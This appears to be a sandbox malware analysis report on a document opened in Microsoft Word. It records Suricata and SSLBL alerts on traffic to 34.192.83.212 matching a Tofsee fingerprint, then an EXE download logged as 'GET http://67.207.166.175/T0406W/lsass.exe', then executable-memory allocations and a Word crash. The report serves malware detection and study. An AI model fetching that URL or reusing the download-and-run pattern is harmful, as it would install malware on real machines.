TCP 192.168.56.101:49422 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49439 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49439 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49417 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49422 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49422 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49417 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49439 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49439 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49423 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49423 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49418 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49423 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49418 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49445 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49418 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49445 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49423 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49445 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49423 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49418 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49418 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49454 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49454 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49428 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49454 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49421 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49428 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49421 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49421 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49428 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49454 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49454 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49428 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49428 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49426 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49457 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49426 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49457 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49426 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49457 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49429 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49429 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49429 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49426 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49426 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49429 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49429 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49452 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49452 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49452 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49434 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49452 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49434 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49452 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49434 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49434 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49434 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49463 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49463 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49463 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49463 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49436 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49463 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49436 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49436 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49465 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49465 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49465 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49442 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49442 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49442 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49465 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49465 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49442 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49442 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49444 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49444 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49444 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49444 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49444 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49447 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49447 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49447 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49447 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49447 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49453 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49453 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49453 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49453 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49453 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49460 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49460 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49460 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49460 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49460 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49461 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49461 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49461 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49461 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49461 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49416 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49416 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49169 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49169 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49241 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49241 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49317 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49317 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49372 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49372 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49188 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49188 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49277 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49277 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49468 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49316 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49316 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49392 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49392 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49445 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49445 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49333 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49333 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49204 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49204 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49312 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49312 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49377 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49377 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49365 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49365 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49325 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49389 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49389 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49325 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49278 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49278 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49300 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49300 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49421 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49421 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49270 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49183 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49270 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49183 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49403 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49199 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49403 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49199 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49446 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49275 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49446 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49436 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49275 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49436 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49281 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49431 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49238 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49281 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49431 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49238 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49410 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49410 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49457 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49457 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49184 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49184 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49332 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49332 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49425 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49425 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49313 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49313 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49259 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49259 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49178 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49178 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49413 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49187 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49413 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49187 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49280 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49280 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49215 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49215 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49370 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49268 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49370 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49268 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49266 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49411 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49266 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49411 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49186 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49186 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49393 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49393 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49242 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49242 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49309 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49309 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49232 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49232 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49464 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49464 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49307 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49307 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49168 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49168 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49176 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49176 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 67.207.166.175:80 -> 192.168.56.101:49164 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 67.207.166.175:80 -> 192.168.56.101:49164 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 67.207.166.175:80 -> 192.168.56.101:49164 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

__exception__

stacktrace:

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3362340
registers.edi: 1953561104
registers.eax: 3362340
registers.ebp: 3362420
registers.edx: 0
registers.ebx: 6176556
registers.esi: 2147944126
registers.ecx: 2841257112
1 0 0

__exception__

stacktrace:

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3362032
registers.edi: 1953561104
registers.eax: 3362032
registers.ebp: 3362112
registers.edx: 0
registers.ebx: 6176772
registers.esi: 2147944122
registers.ecx: 2841257112
1 0 0
suspicious_features: Connection to IP address
suspicious_request: GET http://67.207.166.175/T0406W/lsass.exe
request: GET http://67.207.166.175/T0406W/lsass.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b001000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ad61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ad64000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x507c1000
process_handle: 0xffffffff
1 0 0
Application Crash: Process WINWORD.EXE with pid 2544 crashed
Time & API Arguments Status Return Repeated

